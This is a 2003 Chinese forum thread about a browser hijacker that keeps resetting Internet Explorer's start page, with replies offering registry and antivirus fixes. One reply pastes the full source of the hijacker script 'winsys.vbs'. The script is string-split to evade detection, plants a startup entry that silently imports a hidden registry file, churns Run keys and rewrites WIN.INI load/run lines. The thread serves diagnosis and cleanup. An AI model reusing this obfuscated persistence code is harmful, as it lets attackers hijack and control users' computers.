IE的首页被改了。很奇怪,怎么办呢!

PeterMCT 2003-11-26 09:54:04
我的电脑每次开机后,第一次点IE
就会是 58q 这个网站(类似与hao123的)
我怎么改都去不掉它,用上网助手也不行,重起电脑后它又来了
该怎么办啊?
...全文
106 24 打赏 收藏 转发到动态 举报
写回复
用AI写文章
24 条回复
切换为时间正序
请发表友善的回复…
发表回复
PeterMCT 2003-12-03
  • 打赏
  • 举报
 回复
结贴了。虽然问题还没有解决

但是。我要去住院了。

出院后,再来继续处理这个问题!
yangsm 2003-11-29
  • 打赏
  • 举报
 回复
楼主样,我的也中了,但和你的不一样!我从注册表里来把它删除,可还是不行呀!
monkeys 2003-11-29
  • 打赏
  • 举报
 回复
试试看金山独霸的工具包
PurpleStar 2003-11-28
  • 打赏
  • 举报
 回复
Set sss = CreateObject("WSc" + "ript.Sh" + "ell")
mhk="HK"&"LM\SO"&"FTWARE\Mi"&"cr"&"os"&"oft\Win"&"dows\Cu"&"rren"&"tVersion\Run\"
mhc="H"&"K"&"CU\So"&"ft"&"ware\Mic"&"ros"&"oft\Win"&"dows\Curren"&"tVersion\Run\"
mhk2="HK"&"LM\SO"&"FT"&"WARE\M"&"icr"&"osoft\Wi"&"n"&"dows\Curren"&"tVersion\"
sss.RegWrite ""&mhk&"Sys32","regedit -s C:\$NtUninstallQ5588565$\WINSYS.cer"
sss.RegWrite ""&mhk&"internat.exe","internat.exe"
sss.RegWrite ""&mhk&"zwupdows","12"
sss.RegWrite ""&mhk&"win","12"
sss.RegWrite ""&mhk&"mwin","12"
sss.RegWrite ""&mhk&"internt","12"
sss.RegWrite ""&mhk&"Inernet","12"
sss.RegWrite ""&mhk&"Internet","12"
sss.RegWrite ""&mhk&"iexpleror","12"
sss.RegWrite ""&mhk&"zxdows","12"
sss.RegWrite ""&mhk&"qwe","12"
sss.RegWrite ""&mhk&"win1","12"
sss.RegWrite ""&mhk&"intelnat.exe","12"
sss.RegWrite ""&mhk&"u1888","12"
sss.RegWrite ""&mhk&"intenet","12"
sss.RegWrite ""&mhk&"9i5zxdows","12"
sss.RegWrite ""&mhk&"9i5com01zxdows","12"
sss.RegWrite ""&mhk&"99zxdows","12"
sss.RegWrite ""&mhk&"88zxdows","12"
sss.RegWrite ""&mhk&"Start Pagewin","12"
sss.RegWrite ""&mhk&"Start Page","12"
sss.RegWrite ""&mhk&"u188","12"
sss.RegWrite ""&mhk&"9i5comzxdows","12"
sss.RegWrite ""&mhk&"9q5zxdows","12"
sss.RegWrite ""&mhk&"u1881","12"
sss.RegWrite ""&mhk&"u1882","12"
sss.RegWrite ""&mhk&"u1883","12"
sss.RegWrite ""&mhk&"u1884","12"
sss.RegWrite ""&mhk&"u1885","12"
sss.RegWrite ""&mhk&"u1886","12"
sss.RegWrite ""&mhk&"u1887","12"
sss.RegWrite ""&mhk&"u88y", "12"
sss.RegWrite ""&mhk&"flash", "12"
sss.RegWrite ""&mhk&"999izxdows","12"
sss.RegWrite ""&mhk&"033zxdows","12"
sss.RegWrite ""&mhk&"syste","12"
sss.RegWrite ""&mhc&"my","12"
sss.RegWrite ""&mhk&"3zxdows","12"
sss.RegWrite ""&mhk&"88u88","12"
sss.RegWrite ""&mhk&"system","12"
sss.RegWrite ""&mhk&"8zxdows","12"
sss.RegWrite ""&mhk&"u18","12"
sss.RegWrite ""&mhk&"interneet.exe","12"
sss.RegWrite ""&mhk2&"RunOnce\", "12"
sss.RegWrite ""&mhk&"iexpler", "12"
sss.RegWrite ""&mhk&"u1810", "12"
sss.RegWrite ""&mhk&"winwin", "12"
sss.RegWrite ""&mhk&"WIN32", "12"
sss.RegWrite ""&mhk&"W1N32", "12"
sss.RegWrite ""&mhk&"WlN32", "12"
sss.RegDelete ""&mhc&""
sss.RegDelete ""&mhk&"zwupdows"
sss.RegDelete ""&mhk&"win"
sss.RegDelete ""&mhk&"mwin"
sss.RegDelete ""&mhk&"internt"
sss.RegDelete ""&mhk&"inernet"
sss.RegDelete ""&mhk&"Internet"
sss.RegDelete ""&mhk&"u188"
sss.RegDelete ""&mhk&"iexpleror"
sss.RegDelete ""&mhk&"zxdows"
sss.RegDelete ""&mhk&"qwe"
sss.RegDelete ""&mhk&"win1"
sss.RegDelete ""&mhk&"intelnat.exe"
sss.RegDelete ""&mhk&"intenet"
sss.RegDelete ""&mhk&"9i5zxdows"
sss.RegDelete ""&mhk&"9i5com01zxdows"
sss.RegDelete ""&mhk&"99zxdows"
sss.RegDelete ""&mhk&"88zxdows"
sss.RegDelete ""&mhk&"Start Pagewin"
sss.RegDelete ""&mhk&"Start Page"
sss.RegDelete ""&mhk&"9i5comzxdows"
sss.RegDelete ""&mhk&"9q5zxdows"
sss.RegDelete ""&mhk&"999izxdows"
sss.RegDelete ""&mhk&"033zxdows"
sss.RegDelete ""&mhk&"u1881"
sss.RegDelete ""&mhk&"u1882"
sss.RegDelete ""&mhk&"u1883"
sss.RegDelete ""&mhk&"u1884"
sss.RegDelete ""&mhk&"u1885"
sss.RegDelete ""&mhk&"u1886"
sss.RegDelete ""&mhk&"u1887"
sss.RegDelete ""&mhk&"u88y"
sss.RegDelete ""&mhk&"flash"
sss.RegDelete ""&mhk&"88u88"
sss.RegDelete ""&mhk&"interneet.exe"
sss.RegDelete ""&mhk&"u18"
sss.RegDelete ""&mhk&"u1888"
sss.RegDelete ""&mhk&"system"
sss.RegDelete ""&mhk&"3zxdows"
sss.RegDelete ""&mhk&"8zxdows"
sss.RegDelete ""&mhk&"syste"
sss.RegDelete ""&mhk2&"RunOnce\"
sss.RegDelete ""&mhk&"iexpler"
sss.RegDelete ""&mhk&"u1810"
sss.RegDelete ""&mhk&"winwin"
sss.RegDelete ""&mhk&"WIN32"
sss.RegDelete ""&mhk&"W1N32"
sss.RegDelete ""&mhk&"WlN32"

Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject")
myfile14=FSO.FileExists("c:\wind" + "ows\W" + "IN.INI")
if myfile14 then
set FSO2=FSO.OpenTextFile("c:\win" + "dows\W" + "IN.INI")
mywin=FSO2.ReadALL()
l=Instr(mywin,"run=")-3
m=Instr(mywin,"load=")-1
n=Instr(mywin,"NullPort=")-3
FSO2.close
if l>0 and m>0 and l>m then
set FSO3=FSO.OpenTextFile("c:\wi" + "ndows\W" + "IN.INI")
mywin2=FSO3.Read(l)
FSO3.close
set FSO4=FSO.OpenTextFile("c:\win" + "dows\WI" + "N.INI")
mywin3=FSO4.Read(m)
FSO4.close
if n>0 and n>l then
set FSO5=FSO.OpenTextFile("c:\wind" + "ows\WIN" + ".INI")
mywin4=FSO5.Read(n)
FSO5.close
mywin=Replace(mywin,mywin4,"")
set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI")
FSO2.Write mywin3
FSO2.WriteLine "load="
FSO2.Write "run="
FSO2.Write mywin
FSO2.close
else
mywin=Replace(mywin,mywin2,"")
set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI")
FSO2.Write mywin3
FSO2.Write "load="
FSO2.Write mywin
FSO2.close
end if
end if
end if


winsys.vbs的源文件
试试毒霸的注册表清理工具
DeltaCat 2003-11-27
  • 打赏
  • 举报
 回复
已经发给楼主了,你自己收一下
lianhuang 2003-11-27
  • 打赏
  • 举报
 回复
我和你遇到了同样的问题,也曾安你的方法找到了木马,不过我试了金山度霸站点的这个Duba_RegSolve.exe很简单就解决了。你试试 !
PeterMCT 2003-11-27
  • 打赏
  • 举报
 回复
谢谢大家。
我还在努力杀这个东西~
我的mail.

qigang2002@etang.com
aotianlong 2003-11-27
  • 打赏
  • 举报
 回复
因该在启动项目中可以看到一个regedit开头的项目,然后后面跟着一个文件的路径,你只要取消这个启动项目,然后删除那个文件,重新启动就可以了
avonqin 2003-11-27
  • 打赏
  • 举报
 回复
有谁不怕牺牲,上楼主的那个网站,亲身试验一下,从而找到解决的方法?

前些日子我也中了这么个令人十分讨厌的东东,从注册表删除了所有与那个网址相关的东西,但重新启动后又出来了,气死我啦~~~~
之后我就查看那个网站的HTML代码,果然找到了那段修改注册表的js代码,其实那代码很简单,只要你懂FSO,很快就知道他在你的电脑上做了哪些工作,这样,很快就能把问题解决了。

针对上述程序,得出防止中毒的方法:
通过注册表修改你电脑的fso
scripting.filesystemobject改为scripting.filesystemobject123
这样他就没法在你的电脑上进行fso操作了
liping9211 2003-11-27
  • 打赏
  • 举报
 回复
打开注册表搜索那个网址一个个删除!
DeltaCat 2003-11-27
  • 打赏
  • 举报
 回复
送你个东东,我前几天做的,因为偶要去个网站DOWN东西,但每去一次,他就改我一次,所以偶就写了这么个东东

你要的话,留下MAIL吧
thpht 2003-11-27
  • 打赏
  • 举报
 回复
用3721网站的一键搞定功能,这些都不是问题。但注意,一键搞定完成以后马上重新启动机器!
lovehwq21 2003-11-27
  • 打赏
  • 举报
 回复
有个上网助手可以帮你修复,就不会自已去搞注册表的问题,而且说不定现在你的注册表已经打不开了,我试了两次都是用上网助手修复的。
PeterMCT 2003-11-27
  • 打赏
  • 举报
 回复
首先谢谢各位的支持
可是我还是没把它处理好!
我用了 alexzhang00(三角猫(sjcatsoft)) ( ) 的程序,把它从启动中删除了。可是
重起电脑它还是在
我查了启动中的文件信息,应该是这两个,
程序 命令 用户名 位置
regedit -s c:\$ntuninstallq8877565$\winsys.cer PETER\Administrator
Sys32 regedit -s c:\$ntuninstallq5588565$\winsys.cer All Users


可是我在我的机器中查不出他们。
我用搜索找不到!

希望大家继续给予帮助。并新开一贴,求好的相关工具!

yown 2003-11-27
  • 打赏
  • 举报
 回复
修改注册表对应键值:
http://yowne.8u8.com/tips/regedit.htm
有各种修复方法,绝对超值!
Struggling 2003-11-26
  • 打赏
  • 举报
 回复
http://assistant.3721.com/
xzq686 2003-11-26
  • 打赏
  • 举报
 回复
杀不了,如果没用你就在安全模式下删除!
一般情况下都是这两个下面被修改了,只要改过来就行了,我的主页就被修改过!
HKEY_CURRENT_USER\software\Microsoft\Internet Explorer\Main里面的有"http://5556.com/music/",的项都清空,
HKEY_LOCAL_MACHINE\software\Microsoft\Internet Explorer\Main里的Default_Page_URL键值改回来,去掉那些不好的网止。
chenyang37 2003-11-26
  • 打赏
  • 举报
 回复
找到文件路径,在安全模式下可以直接删除!(如果只是修改ie的木马可以这样解决)
其他的你还是找一些相关软件杀吧,具体也不好说
PeterMCT 2003-11-26
  • 打赏
  • 举报
 回复
对。我用木马克星查到我的机器有两个木马

可是,没有注册,杀不了啊!

chenyang37 2003-11-26
  • 打赏
  • 举报
 回复
呵呵,我遇到过一次,这是个木马程序搞的鬼,在你系统启动的时候,会自动加载一个程序,你看看你的进程里有没有什么特别的程序在运行,进安全模式删除此文件就可以了
我就是这么解决的
加载更多回复(4)
超强的IE背景图片闪烁(抖动)的解决办法
很多人都遇到过在页面部分操作中IE背景图片重新加载而导致页面闪动的bug,那么如何解决它呢? 在国外某blog上看到一解决办法:...但很奇怪为什么这不是IE浏览器默认的选项呢?有哪位高人知道原因的请告知俺,不甚感激!
修复被劫持、篡的IE主页
我很奇怪,于是再次重复上述操作,然后打开新选项卡,发现多打开几次后,主页又被修了,于是乎修注册表,但发现问题依旧,感觉就像后台有程序在监控我的操作一样,每当我打开IE9,它会自动将主页之!...
为何windows设置默认浏览器总是不行,或者设置后系统又擅自为IE
今天开始打开项目时,发现突然间我的浏览器被成了IE打开,真是见鬼了,我对天发誓:并没有设置过默认浏览器为IE! 随后,当然是修默认浏览器了,如下常规操作:控制面板》程序》默认程序》设置默认程序》web...
记一次修复被篡的IE首页
今天开电脑,打开IE发现首页被篡为...只好手动运行金山卫士扫描,结果没发现恶意插件,倒是检测到IE首页被篡了,设置修复为http://www.baidu.com,完毕后,再次运行IE发现首页还是http://www.you2000.cn/,这就奇怪
升级到IE8后的奇怪现象
安装好WindowsXP系统后,...后来我把IE6升级到IE8(就是Internet Explorer 8.0),奇怪的现象就出现了。我发现打开的网页比以前变大了,不管使用IE8还是360浏览器都一样大,只不过IE8右下角显示“125%”,而360浏览器右
ASP

28,407

社区成员

356,948

社区内容

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章